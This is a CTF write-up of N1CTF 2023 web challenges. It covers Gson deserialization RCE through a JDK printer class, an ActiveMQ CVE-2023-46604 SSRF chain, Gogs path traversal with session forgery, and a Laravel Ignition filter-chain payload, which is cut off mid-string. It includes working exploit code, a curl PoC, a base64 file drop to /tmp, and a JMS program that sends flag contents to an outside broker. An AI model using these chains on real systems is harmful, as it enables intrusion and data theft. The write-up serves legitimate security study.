November 6, 2023

N1CTF 2023 Web Post-Competition Reproduction Writeup

StrangePort

Topics tested: ActiveMQ, Gson deserialization
The internal network runs an ActiveMQ + Spring Boot project, fronted by an nginx reverse proxy so that the services cannot reach the Internet. We start by analyzing the Spring Boot service.
Only one API route is exposed, and its purpose is simply Gson deserialization, so the first thing to work out is how to turn that into RCE.

```java
import com.google.gson.Gson;

import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class GsonDemo {
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException {
        // Base64-encoded JSON body, in the same form the challenge's API receives it
        String Json = "eyJscGNBbGxDb20iOlsidG91Y2ggL3RtcC9hYWFhYSIsInRvdWNoIC90bXAvYWFhYWEiXX0=";
        // Target class name; in the challenge this is taken from the URL as well
        String Person = "Person";
        Gson gson = new Gson();
        // Class.forName on a caller-supplied name: any loadable class becomes a Gson target
        Person o = (Person) gson.fromJson(new String(Base64.getDecoder().decode(Json), StandardCharsets.UTF_8), Class.forName(Person));
    }
}
```

The Base64 JSON here can be anything; let's step through it in the debugger to understand how Gson deserialization behaves.

```java
public class Person {

    // No-arg constructor: prints so we can see whether Gson calls it
    public Person() {
        System.out.println(1111);
    }
    public String name = "john";
    public String age = "11";

    public String toString() {
        return "Person{name='" + this.name + "', age='" + this.age + "'}";
    }

    public Person(String name, String age) {
        this.name = name;
        this.age = age;
    }

    // Serialization hook; included to check whether Gson honours it (it does not)
    Object writeReplace() {
        System.out.println('1');
        return 1;
    }

    public String getName() {
        return this.name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public String getAge() {
        return this.age;
    }

    public void setAge(String age) {
        this.age = age;
    }
}
```

When the class being deserialized has a no-arg constructor, Gson calls it directly.
If there is no such constructor, Gson falls back to Unsafe instantiation.
Knowing this behaviour, we can think about how to turn it into RCE: the call chain we need is constructor -> Runtime.exec. During the competition it didn't click for me; only afterwards did I remember that Linux servers ship many UnixPrinter classes, and almost every method in them concatenates a command, which leads to RCE. The class used today is PrintServiceLookupProvider, though it doesn't have to be that one: in testing, any class that implements PrintServiceLookup works, because their constructors all start a while(true) thread that keeps calling methods.
So let's write a small demo to make this easier to understand.

```java
import java.io.IOException;

public class Person {

    // Command built by string concatenation with a field; note that the field
    // still holds its initializer value when the constructor runs
    public Person() throws IOException {
        Runtime.getRuntime().exec("whoami" + age);
    }
    public String name = "john";
    public String age = "11";

    public String toString() {
        return "Person{name='" + this.name + "', age='" + this.age + "'}";
    }

    public Person(String name, String age) {
        this.name = name;
        this.age = age;
    }

    public String getName() {
        return this.name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public String getAge() {
        return this.age;
    }

    public void setAge(String age) {
        this.age = age;
    }
}
```

The constructor of this Person class obviously concatenates a command, so we pass the payload {"name":"qwq",age:";touch /tmp/pwned"}
We find that Person's age attribute is still the default 11, so simply placing command concatenation in the constructor doesn't work here. The PrintService mentioned earlier instead starts a new thread that loops repeatedly, like this.

```java
import java.io.IOException;

public class Person {
    // Inner worker that re-reads the outer field on every iteration, so it
    // picks up the value Gson assigns after the constructor has returned
    class RceThread implements Runnable {
        @Override
        public void run() {
            while (true) {
                try {
                    Runtime.getRuntime().exec(age);
                } catch (IOException e) {
                    throw new RuntimeException(e);
                }
            }
        }
    }

    // Mirrors the PrintServiceLookup constructors: spawn a daemon thread and return
    public Person() throws IOException {
        Thread thr = new Thread(null, new Person.RceThread(),
                "Rce", 0, false);
        thr.setDaemon(true);
        thr.start();
    }
    public String name = "john";
    public String age = "11";

    public String toString() {
        return "Person{name='" + this.name + "', age='" + this.age + "'}";
    }

    public Person(String name, String age) {
        this.name = name;
        this.age = age;
    }

    public String getName() {
        return this.name;
    }

    public void setName(String name) {
        this.name = name;
    }

    public String getAge() {
        return this.age;
    }

    public void setAge(String age) {
        this.age = age;
    }
}
```

```java
import com.google.gson.Gson;

import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class GsonDemo {
    public static void main(String[] args) throws NoSuchMethodException, InvocationTargetException, InstantiationException, IllegalAccessException, ClassNotFoundException, IOException {
        // String Json="eyJscGNBbGxDb20iOlsidG91Y2ggL3RtcC9hYWFhYSIsInRvdWNoIC90bXAvYWFhYWEiXX0=";
        // String Person="sun.print.PrintServiceLookupProvider";
        String Json = "eyJuYW1lIjoicXdxIixhZ2U6InRvdWNoIC90bXAvcHduZWQifQ==";
        String Person = "Person";
        Gson gson = new Gson();
        // Loop so the JVM (and the daemon thread started by the constructor) stays alive
        while (true) {
            Person o = (Person) gson.fromJson(new String(Base64.getDecoder().decode(Json), StandardCharsets.UTF_8), Class.forName(Person));
        }
    }
}
```


RCE succeeded~
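The root cause behind all of the demos above is that the target type handed to Gson comes straight from the request URL. As an added example (not code from the challenge or from this writeup), the following shows that vulnerable pattern next to an allowlist-based replacement; the `Person` DTO, the `SafeGsonEndpoint` class and the `ALLOWED_TYPES` map are assumptions for illustration, and Gson is assumed to be on the classpath.

```java
import com.google.gson.Gson;
import com.google.gson.JsonSyntaxException;

import java.util.Map;

// Added example, not code from the challenge or the writeup. Shows the
// vulnerable pattern (class name from the URL resolved with Class.forName)
// next to a replacement that resolves the name against a fixed allowlist.
public class SafeGsonEndpoint {

    // Hypothetical DTO the API is actually meant to accept (assumption).
    public static class Person {
        public String name;
        public String age;
    }

    // The only names that may ever be used as Gson target types (assumption).
    private static final Map<String, Class<?>> ALLOWED_TYPES = Map.of(
            "Person", Person.class
    );

    // Vulnerable: the caller picks the class, so any loadable class with a
    // no-arg constructor is instantiated, with all of that constructor's side effects.
    public static Object deserializeUnsafe(String className, String json)
            throws ClassNotFoundException {
        return new Gson().fromJson(json, Class.forName(className));
    }

    // Hardened: the name is only a key into a fixed map; unknown names are
    // rejected before any class loading or instantiation can happen.
    public static Object deserializeSafe(String typeName, String json) {
        Class<?> target = ALLOWED_TYPES.get(typeName);
        if (target == null) {
            throw new IllegalArgumentException("type not allowed: " + typeName);
        }
        try {
            return new Gson().fromJson(json, target);
        } catch (JsonSyntaxException e) {
            throw new IllegalArgumentException("malformed JSON", e);
        }
    }

    public static void main(String[] args) {
        String json = "{\"name\":\"qwq\",\"age\":\"11\"}";
        Person p = (Person) deserializeSafe("Person", json);
        System.out.println(p.name + " / " + p.age);

        // A JDK class name is refused before Gson ever sees it
        try {
            deserializeSafe("sun.print.PrintServiceLookupProvider", "{}");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The `deserializeSafe` path is what the challenge's single API route should have done: the URL segment selects an entry in a fixed map, and nothing from the request is ever passed to `Class.forName`. It also explains why the demos above behave as they do: Gson runs the no-arg constructor (or an Unsafe allocation) before it assigns any field, so the type-resolution step is the last point at which the server can still refuse.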
Now back to the challenge itself, and the logic of this inner class.
Debugging shows that the following method gets executed.
Here execCmd is called, and it concatenates the outer class's fields into a command, so a simple PoC is:
{"lpcAllCom":["touch /tmp/aaaaa","touch /tmp/aaaaa"]}

```bash
curl http://127.0.0.1:8877/api/sun.print.PrintServiceLookupProvider/eyJscGNBbGxDb20iOlsidG91Y2ggL3RtcC9hYWFhYSIsInRvdWNoIC90bXAvYWFhYWEiXX0=
```
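On the defensive side, the request shape in that curl command is easy to recognise in the reverse proxy's access log. The following checker is an added example, not part of the original writeup or the challenge: the access-log format, the `ApiLogChecker` class and the `EXPECTED_TYPES` set are assumptions, and the sample lines are constructed for the demo (the second one reuses the PoC path shown above).

```java
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.Base64;
import java.util.List;
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

// Added example, not from the writeup: flags /api/<class>/<base64> requests
// whose class segment is not an expected DTO, or whose decoded JSON carries
// the lpcAllCom field that belongs to the JDK printer class, not to the app.
public class ApiLogChecker {

    // Request-line shape of the challenge route: /api/<className>/<base64 JSON>
    private static final Pattern API_PATH = Pattern.compile(
            "\"(?:GET|POST) /api/([^/ ]+)/([A-Za-z0-9+/=]+) HTTP/[0-9.]+\"");

    // Type names the application legitimately deserializes (assumption).
    private static final Set<String> EXPECTED_TYPES = Set.of("Person");

    // Returns one finding per suspicious line; an empty list means nothing was flagged.
    public static List<String> findSuspicious(List<String> logLines) {
        List<String> findings = new ArrayList<>();
        for (String line : logLines) {
            Matcher m = API_PATH.matcher(line);
            if (!m.find()) {
                continue; // not the deserialization route
            }
            String className = m.group(1);
            String body = decodeOrEmpty(m.group(2));
            if (!EXPECTED_TYPES.contains(className)) {
                findings.add("unexpected target type '" + className + "': " + line);
            } else if (body.contains("\"lpcAllCom\"")) {
                findings.add("gadget field in body for '" + className + "': " + line);
            }
        }
        return findings;
    }

    // Base64 that does not decode is treated as an empty body rather than an
    // error, so one malformed request cannot abort the whole scan.
    private static String decodeOrEmpty(String b64) {
        try {
            return new String(Base64.getDecoder().decode(b64), StandardCharsets.UTF_8);
        } catch (IllegalArgumentException e) {
            return "";
        }
    }

    public static void main(String[] args) {
        // Constructed sample lines in nginx "combined" style (not real traffic)
        List<String> sample = List.of(
            "127.0.0.1 - - [06/Nov/2023:12:00:00 +0000] \"GET /api/Person/eyJuYW1lIjoicXdxIiwiYWdlIjoiMTEifQ== HTTP/1.1\" 200 17",
            "127.0.0.1 - - [06/Nov/2023:12:00:01 +0000] \"GET /api/sun.print.PrintServiceLookupProvider/eyJscGNBbGxDb20iOlsidG91Y2ggL3RtcC9hYWFhYSIsInRvdWNoIC90bXAvYWFhYWEiXX0= HTTP/1.1\" 200 2",
            "127.0.0.1 - - [06/Nov/2023:12:00:02 +0000] \"GET /static/app.js HTTP/1.1\" 200 5120"
        );
        for (String finding : findSuspicious(sample)) {
            System.out.println("ALERT " + finding);
        }
    }
}
```

The class-name check does the real work: a request naming a JDK or third-party class on this route is wrong regardless of its body. The body check is a second signal for probing attempts that keep an expected type but still carry the gadget's field name; Gson ignores unknown fields, so those requests are harmless on their own but worth recording.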

The command executed successfully, which confirms the PoC. Now we look outward at ActiveMQ. A 0day was recently disclosed in ActiveMQ: a malicious XML can be loaded through the Cpx (ClassPathXmlApplicationContext) class to get RCE, but that requires outbound network access, and this challenge has none, so we turn the RCE into an SSRF- -
See:
Apache ActiveMQ (version < 5.18.3) RCE analysis
X1roz wrote it up in detail; it's a great article, very strong (a bit in awe).
We need to use ActiveMQ's queue mechanics to bring the flag out. Here I borrowed from team Nese's PoC.

```java
import org.apache.activemq.ActiveMQConnectionFactory;
import javax.jms.*;
import java.util.Scanner;

public class Main implements MessageListener {
    // Runs on the internal host: reads the flag and publishes it to a queue
    // on the local broker, which is reachable from inside the network
    private void publish() throws Exception {
        javax.jms.ConnectionFactory factory;
        factory = new ActiveMQConnectionFactory("tcp://127.0.0.1:61616");
        Connection connection = factory.createConnection();
        Session pubSession = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);
        Queue queue = pubSession.createQueue("flagqueue");
        MessageProducer publisher = pubSession.createProducer(queue);
        String[] cmd = new String[]{"/bin/sh", "-c", "cat /flag"};
        byte[] bs = new Scanner(new ProcessBuilder(cmd).start().getInputStream())
                .useDelimiter("\\A")
                .next()
                .getBytes();
        String message = new String(bs);
        TextMessage msg = pubSession.createTextMessage();
        msg.setText(message);
        publisher.send(msg);
        System.out.println("publish finished");
        connection.close();
    }

    // Runs on the attacker side: subscribes to the same queue through the
    // exposed broker port and prints whatever arrives
    private void consume() throws Exception {
        ConnectionFactory factory = new ActiveMQConnectionFactory("tcp://xxx:61616");
        Connection connection = factory.createConnection();
        Session subSession = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);
        Queue queue = subSession.createQueue("flagqueue");
        MessageConsumer subscriber = subSession.createConsumer(queue);
        subscriber.setMessageListener(this);
        connection.start();
    }

    public static void main(String[] args) throws Exception {
        Main main = new Main();
        main.publish();
    }

    @Override
    public void onMessage(Message message) {
        try {
            System.out.println("Received " + ((TextMessage) message).getText());
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

We first need to write this file to some location on the server, then compile and run it.

```bash
echo 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|base64 -d >/tmp/Main.class
```

The constructed JSON is as follows

```json
{"lpcAllCom":["echo aW1wb3J0IG9yZy5hcGFjaGUuYWN0aXZlbXEuQWN0aXZlTVFDb25uZWN0aW9uRmFjdG9yeTsKaW1wb3J0IGphdmF4Lmptcy4qOwoKcHVibGljIGNsYXNzIE1haW4gaW1wbGVtZW50cyBNZXNzYWdlTGlzdGVuZXIgewogICAgcHJpdmF0ZSB2b2lkIHB1Ymxpc2goKSB0aHJvd3MgRXhjZXB0aW9uIHsKICAgICAgICBqYXZheC5qbXMuQ29ubmVjdGlvbkZhY3RvcnkgZmFjdG9yeTsKICAgICAgICBmYWN0b3J5ID0gbmV3IEFjdGl2ZU1RQ29ubmVjdGlvbkZhY3RvcnkoInRjcDovLzEyNy4wLjAuMTo2MTYxNiIpOwogICAgICAgIENvbm5lY3Rpb24gY29ubmVjdGlvbiA9IGZhY3RvcnkuY3JlYXRlQ29ubmVjdGlvbigpOwogICAgICAgIFNlc3Npb24gcHViU2Vzc2lvbiA9IGNvbm5lY3Rpb24uY3JlYXRlU2Vzc2lvbihmYWxzZSwgU2Vzc2lvbi5BVVRPX0FDS05PV0xFREdFKTsKICAgICAgICBRdWV1ZSBxdWV1ZSA9IHB1YlNlc3Npb24uY3JlYXRlUXVldWUoImZsYWdxdWV1ZSIpOwogICAgICAgIE1lc3NhZ2VQcm9kdWNlciBwdWJsaXNoZXIgPSBwdWJTZXNzaW9uLmNyZWF0ZVByb2R1Y2VyKHF1ZXVlKTsKICAgICAgICBTdHJpbmdbXSBjbWQgPSBuZXcgU3RyaW5nW117Ii9iaW4vc2giLCItYyIsImNhdCAvZmxhZyJ9OwogICAgICAgIGJ5dGVbXSBicyA9IG5ldyBTY2FubmVyKG5ldyBQcm9jZXNzQnVpbGRlcihjbWQpLnN0YXJ0KCkuZ2V0SW5wdXRTdHJlYW0oKSkKICAgICAgICAgICAgICAgIC51c2VEZWxpbWl0ZXIoIlxcQSIpCiAgICAgICAgICAgICAgICAubmV4dCgpCiAgICAgICAgICAgICAgICAuZ2V0Qnl0ZXMoKTsKICAgICAgICBTdHJpbmcgbWVzc2FnZSA9IG5ldyBTdHJpbmcoYnMpOwogICAgICAgIFRleHRNZXNzYWdlIG1zZyA9IHB1YlNlc3Npb24uY3JlYXRlVGV4dE1lc3NhZ2UoKTsKICAgICAgICBtc2cuc2V0VGV4dChtZXNzYWdlKTsKICAgICAgICBwdWJsaXNoZXIuc2VuZChtc2cpOwogICAgICAgIFN5c3RlbS5vdXQucHJpbnRsbigicHVibGlzaCBmaW5pc2hlZCIpOwogICAgICAgIGNvbm5lY3Rpb24uY2xvc2UoKTsKICAgIH0KCiAgICBwcml2YXRlIHZvaWQgY29uc3VtZSgpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIENvbm5lY3Rpb25GYWN0b3J5IGZhY3RvcnkgPSBuZXcgQWN0aXZlTVFDb25uZWN0aW9uRmFjdG9yeSgidGNwOi8veHh4OjYxNjE2Iik7CiAgICAgICAgQ29ubmVjdGlvbiBjb25uZWN0aW9uID0gZmFjdG9yeS5jcmVhdGVDb25uZWN0aW9uKCk7CiAgICAgICAgU2Vzc2lvbiBzdWJTZXNzaW9uID0gY29ubmVjdGlvbi5jcmVhdGVTZXNzaW9uKGZhbHNlLCBTZXNzaW9uLkFVVE9fQUNLTk9XTEVER0UpOwogICAgICAgIFF1ZXVlIHF1ZXVlID0gc3ViU2Vzc2lvbi5jcmVhdGVRdWV1ZSgiZmxhZ3F1ZXVlIik7CiAgICAgICAgTWVzc2FnZUNvbnN1bWVyIHN1YnNjcmliZXIgPSBzdWJTZXNzaW9uLmNyZWF0ZUNvbnN1bWVyKHF1ZXVlKTsKICAgICAgICBzdWJzY3JpYmVyLnNldE1lc3NhZ2VMaXN0ZW5lcih0aGlzKTsKICAgICAgICBjb25uZWN0aW9uLnN0YXJ0KCk7CiAgICB9CgoKICAgIHB1YmxpYyBzdGF0aWMgdm9pZCBtYWluKFN0cmluZ1tdIGFyZ3MpIHRocm93cyBFeGNlcHRpb24gewogICAgICAgIE1haW4gbWFpbiA9IG5ldyBNYWluKCk7CiAgICAgICAgIG1haW4ucHVibGlzaCgpOwogICAgfQoKICAgIEBPdmVycmlkZQogICAgcHVibGljIHZvaWQgb25NZXNzYWdlKE1lc3NhZ2UgbWVzc2FnZSkgewogICAgICAgIHRyeSB7CiAgICAgICAgICAgIFN5c3RlbS5vdXQucHJpbnRsbigiUmVjZWl2ZWQgIiArICgoVGV4dE1lc3NhZ2UpIG1lc3NhZ2UpLmdldFRleHQoKSk7CiAgICAgICAgfSBjYXRjaCAoRXhjZXB0aW9uIGUpIHsKICAgICAgICAgICAgZS5wcmludFN0YWNrVHJhY2UoKTsKICAgICAgICB9CiAgICB9Cn0gICAK|base64 -d >/tmp/Main.class","echo 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|base64 -d >/tmp/Main.class"]}
```
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

```bash
java -cp /opt/apache-activemq/lib/optional/*:/tmp/:/opt/apache-activemq/activemq-all-5.17.5.jar Main
```
Then, following X1roz's PoC above, we can change it to

```java
public void oneway(Object command) throws IOException {
    this.checkStarted();
    // Same shape as the referenced PoC, but the URL now points at the internal
    // Spring Boot API, so the load performed by the broker becomes an SSRF
    // into the Gson endpoint instead of fetching an external XML
    Throwable obj = new ClassPathXmlApplicationContext("http://127.0.0.1:8877/api/sun.print.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");
    ExceptionResponse response = new ExceptionResponse(obj);
    this.wireFormat.marshal(response, this.dataOut);
    this.dataOut.flush();
}
```

```java
import org.apache.activemq.ActiveMQConnectionFactory;
import javax.jms.*;
import java.util.Scanner;

// Publisher-only variant of Main: runs on the internal host and pushes the
// flag into the queue; the consumer side is the one shown earlier
public class Main {
    public static void main(String[] args) throws Exception {
        javax.jms.ConnectionFactory factory;
        factory = new ActiveMQConnectionFactory("tcp://127.0.0.1:61616");
        Connection connection = factory.createConnection();
        Session pubSession = connection.createSession(false, Session.AUTO_ACKNOWLEDGE);
        Queue queue = pubSession.createQueue("flagqueue");
        MessageProducer publisher = pubSession.createProducer(queue);
        String[] cmd = new String[]{"/bin/sh", "-c", "cat /flag"};
        byte[] bs = new Scanner(new ProcessBuilder(cmd).start().getInputStream())
                .useDelimiter("\\A")
                .next()
                .getBytes();
        String message = new String(bs);
        TextMessage msg = pubSession.createTextMessage();
        msg.setText(message);
        publisher.send(msg);
        System.out.println("publish finished");
        connection.close();
    }
}
```

By this point I've gone through the ActiveMQ vulnerability from start to finish, and it's brilliant. The write-up is here:
https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/
Next we just need to imitate the PoC above to perform the SSRF.
Reproducing the full chain is too much of a hassle- - getting to this step is enough; honestly the no-outbound-network constraint is superfluous.
If you put ActiveMQ on the outside and keep the "port" service inside without mapping its port, isn't that the same thing?

ggbond’s gogs

Honestly I didn't particularly want to look at this one; I'm just pasting the writeup's content.
Reference:
N1CTF 2023 writeup
In internal/db/repo_editor.go, the UpdateRepoFile function previously had a directory traversal through the NewTreeName parameter that allowed writing .git/config for RCE; after that fix, NewTreeName got filtering.
Look at the OldTreeName parameter instead: when accessed from the Web interface it is read from the database as c.Repo.TreePath, but when accessed from the API endpoint PUT /repos/:username/:reponame/contents/* it is taken directly from the route via c.Param("*"). So passing ../../ gives directory traversal and an arbitrary file write.
Start a Gogs locally; the admin with ID 1 is named root. Sessions are stored as files by default, so Base64-encode the admin Session and send a request that writes the Session file into the target directory.

Dv+BBAEC/4IAARABEAAAWv+CAAMGc3RyaW5nDAcABXVuYW1lBnN0cmluZwwGAARyb290BnN0cmluZwwKAAhfb2xkX3VpZAZzdHJpbmcMAwABMQZzdHJpbmcMBQADdWlkBWludDY0BAIAAg==

Create an API Token in a normal account's settings, then call the API:

Log in to the admin account with Cookie f01f9038fe591924, configure a Git pre-receive hook on any repository, then upload a file to that repository to trigger the hook's command and achieve RCE. Use curl to bring the flag out:


I'm so diligent (I'm a lazy dog)

Laravel

A fileless filter-chain technique from P神's Knowledge Planet.
Directly overwrite that index.php

```json
{
  "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
  "parameters": {
    "variableName": "username",
    "viewFile": "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CN.ISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO_6937-2:1983.R9|convert.iconv.OSF00010005.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP949.UTF32BE|convert.iconv.ISO_69372.CSIBM921|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.